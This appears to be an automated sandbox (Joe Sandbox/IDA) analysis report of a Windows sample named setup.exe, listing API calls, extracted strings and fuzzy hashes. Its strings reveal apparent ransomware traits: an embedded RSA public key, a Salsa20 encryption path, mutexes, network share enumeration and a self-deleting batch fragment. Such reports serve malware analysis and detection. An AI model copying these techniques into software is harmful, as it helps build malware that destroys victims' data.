                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                • String ID:
                • API String ID: 120817956-0
                • Opcode ID: e228db8f2929126c3b1913005bb93d35ef70577a56d5a0348c895a46b4dbfa9c
                • Instruction ID: aa06b8048d3bf760f527e7d0bbb9ad0a08af858ba63749c6f8d7f01112261dfe
                • Opcode Fuzzy Hash: e228db8f2929126c3b1913005bb93d35ef70577a56d5a0348c895a46b4dbfa9c
                • Instruction Fuzzy Hash: E731E3B2A006059BCB20DF68C5816AEB7F9EF45750F21823FE856D7740DB38DD448BA9
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004167E6
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                • String ID:
                • API String ID: 120817956-0
                • Opcode ID: e14d4706ebd2937f549925ab355345f0cc1dac9e10c7ad741e7fc5df18ade2da
                • Instruction ID: efb258ddcfae47249c3acbfcaa5a8e986a9cbccba7edf1416c99c2e95f316cd5
                • Opcode Fuzzy Hash: e14d4706ebd2937f549925ab355345f0cc1dac9e10c7ad741e7fc5df18ade2da
                • Instruction Fuzzy Hash: B83126B1A016019FDB24DF29C5807AEBBF4EB40364F104A2EE426977C0D738DA80C7A6
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004165C5
                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                • String ID:
                • API String ID: 657562460-0
                • Opcode ID: f435e59981ddbbd5e7f20df7de0e78d9e90dcc99dfbaf1614d1af27faf295db4
                • Instruction ID: 5021f87c270b400a587bd724d9b61bde01bf534475f8b0cbfe068d44a909a5c2
                • Opcode Fuzzy Hash: f435e59981ddbbd5e7f20df7de0e78d9e90dcc99dfbaf1614d1af27faf295db4
                • Instruction Fuzzy Hash: A72124B5A00115DBCB14DF5CD981B9ABFA9EF45700F04822AEC058B348D738EA14CBE5
                APIs
                • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0041FA25
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                • Instruction ID: 74150d4eedde67828055b261a2b9f98274f0c47e32cd20f87c2cefabb50f2d8a
                • Opcode Fuzzy Hash: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                • Instruction Fuzzy Hash: F1D05E322883147BE3140A9AAC06F867AC88B15B20F00403AB609DA1C0D9A1A8108A9C
                APIs
                  • Part of subcall function 00410BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0041FDA4
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: EnumMessageOpenSend
                • String ID:
                • API String ID: 1835186980-0
                • Opcode ID: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                • Instruction ID: f1b321f5059a27c682919cb5e20fd2d447803ac3e15b06371c74c2023cac73f2
                • Opcode Fuzzy Hash: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                • Instruction Fuzzy Hash: 27E02B311043406AD32097A4DC01F82BBC49F18728F00C81EF7CA6B9C1C5F1B04487ED
                APIs
                • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00529230), ref: 0041FDD6
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                • Instruction ID: 36d07be7825d0dd215c2e58fd0e5fada4a3bc662417c17551b787912ef620d2a
                • Opcode Fuzzy Hash: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                • Instruction Fuzzy Hash: 6FD012753C9305B7E7180BA6BC47F593A989B29B00F504036F60DD92D0DAB1F4509A5C
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __fsopen
                • String ID:
                • API String ID: 3646066109-0
                • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                • Instruction ID: 292279633ce522dfb3aa62ab9f23dea9a591004ce3b356b458beb681742a1975
                • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                • Instruction Fuzzy Hash: FDB0927254021C77CF012E82EC02A493B199B60764F448021FB1C181B1E6BBE66496C9
                APIs
                • _doexit.LIBCMT ref: 00427F47
                  • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00000000,00000001,00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E5B
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E6C
                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E85
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E95
                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E9B
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427EB1
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427EBC
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Pointer$Decode$Encode$__lock_doexit
                • String ID:
                • API String ID: 2158581194-0
                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                • Instruction ID: 060863096896a5b816ca94ba1531ddaea04f54b188c1fa908ac11e743c0bd32b
                • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                • Instruction Fuzzy Hash: 1EB0927254020C77CE012A82EC02A497B199B516A4F408021FB0C18571A677A6A09A89
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide
                • String ID:
                • API String ID: 626452242-0
                • Opcode ID: 3083106c52cca49195eafaad81dd10d3becbaf549cad33685b2291d716977e0e
                • Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
                • Opcode Fuzzy Hash: 3083106c52cca49195eafaad81dd10d3becbaf549cad33685b2291d716977e0e
                • Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA
                APIs
                • _wcscmp.LIBCMT ref: 004382B9
                • _wcscmp.LIBCMT ref: 004382CA
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale_wcscmp
                • String ID: ACP$OCP
                • API String ID: 1351282208-711371036
                • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                APIs
                Strings
                • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG, xrefs: 00419EC4
                • p2Q, xrefs: 00419EE2
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG$p2Q
                • API String ID: 2102423945-2601835732
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                APIs
                Strings
                • input != nullptr && output != nullptr, xrefs: 0040C095
                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __wassert
                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                • API String ID: 3993402318-1975116136
                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                APIs
                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                • GetLastError.KERNEL32 ref: 00412509
                • CloseHandle.KERNEL32 ref: 0041251C
                • CloseHandle.KERNEL32 ref: 00412539
                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                • GetLastError.KERNEL32 ref: 0041255B
                • CloseHandle.KERNEL32 ref: 0041256E
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorLastMutex
                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                • API String ID: 2372642624-488272950
                • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                APIs
                • GetLastError.KERNEL32 ref: 00411915
                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                • _memset.LIBCMT ref: 004119B8
                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                • String ID: failed with error
                • API String ID: 4182478520-946485432
                • Opcode ID: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
                • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                • Opcode Fuzzy Hash: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
                • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                APIs
                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                • SelectObject.GDI32(?,?), ref: 00482436
                • DeleteObject.GDI32(00000000), ref: 0048243D
                • DeleteDC.GDI32(?), ref: 0048244A
                • DeleteDC.GDI32(?), ref: 00482450
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                • API String ID: 151064509-1805842116
                • Opcode ID: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
                • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                • Opcode Fuzzy Hash: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
                • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                • API String ID: 909875538-2733969777
                • Opcode ID: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
                • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                • Opcode Fuzzy Hash: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
                • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 782461e458cf13f7b69974c70a27adc99d6df7de0ead0becf0edf776f9ba6d56
                • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                • Opcode Fuzzy Hash: 782461e458cf13f7b69974c70a27adc99d6df7de0ead0becf0edf776f9ba6d56
                • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                APIs
                • DecodePointer.KERNEL32 ref: 00427B29
                • _free.LIBCMT ref: 00427B42
                  • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13
                • _free.LIBCMT ref: 00427B55
                • _free.LIBCMT ref: 00427B73
                • _free.LIBCMT ref: 00427B85
                • _free.LIBCMT ref: 00427B96
                • _free.LIBCMT ref: 00427BA1
                • _free.LIBCMT ref: 00427BC5
                • EncodePointer.KERNEL32(005FCE90), ref: 00427BCC
                • _free.LIBCMT ref: 00427BE1
                • _free.LIBCMT ref: 00427BF7
                • _free.LIBCMT ref: 00427C1F
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID:
                • API String ID: 3064303923-0
                • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                APIs
                • CoInitialize.OLE32(00000000), ref: 00411BB0
                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                • CoUninitialize.OLE32 ref: 00411BD0
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
